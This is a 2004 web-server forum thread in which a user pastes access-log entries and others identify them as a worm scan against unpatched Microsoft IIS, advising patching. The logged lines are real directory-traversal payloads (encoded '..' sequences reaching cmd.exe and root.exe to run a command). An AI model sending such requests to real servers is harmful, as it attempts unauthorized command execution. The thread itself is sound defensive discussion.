Hacked/Security Flaw?

 
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions
View previous topic :: View next topic  
Author Message
jmoschetti45
-


Joined: 29 Oct 2003
Posts: 95
Location: MI USA

PostPosted: Mon Mar 01, 2004 8:49 pm    Post subject: Hacked/Security Flaw? Reply with quote

I just happened to look in the log file and came across the following mess:

68.124.115.170 - - [13/Feb/2004:23:17:27 -0500] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:28 -0500] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:28 -0500] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:29 -0500] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:29 -0500] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:30 -0500] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:30 -0500] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:31 -0500] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:31 -0500] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:32 -0500] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:32 -0500] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:33 -0500] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 239 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:34 -0500] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""
68.124.115.170 - - [13/Feb/2004:23:17:34 -0500] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 241 "" ""

Thing is I don't have a 'scripts' or 'msadc' folder. It also looks like something was trying to get to cmd.exe. Good thing Win 98 dosen't have it. Does anybody know what happened here?
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger
Anonymoose
-


Joined: 09 Sep 2003
Posts: 2192

PostPosted: Mon Mar 01, 2004 8:54 pm    Post subject: Reply with quote

It's a scan by a worm designed to infect machines running unpatched versions of Microsoft IIS. Even if Windows 98 did have a cmd.exe it wouldn't have been served up by Abyss - the pathnames are designed to target a specific flaw in IIS. The 404 at the end of the line means the file was not found or served to the requesting IP - no danger to you at all, this is pretty much background traffic on the internet now until ISPs finally pull their finger out and start removing internet access from users with infected machines.
Back to top View user's profile Send private message
iNaNimAtE
-


Joined: 05 Nov 2003
Posts: 2381
Location: Everywhere you're not.

PostPosted: Tue Mar 02, 2004 2:26 am    Post subject: Reply with quote

Yeah, I get these all the time. I really pay no attention because I did the best to secure my server, and I know these attacks are harmless. I suggest you look around for lists of common vulnerabilities, and make sure to "patch up!"
_________________
Bienvenidos!
Back to top View user's profile Send private message Send e-mail Visit poster's website AIM Address Yahoo Messenger MSN Messenger ICQ Number
Display posts from previous:   
Post new topic   Reply to topic    Aprelium Forum Index -> General Questions All times are GMT + 1 Hour
Page 1 of 1

 
Jump to:  
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum


Powered by phpBB phpBB Group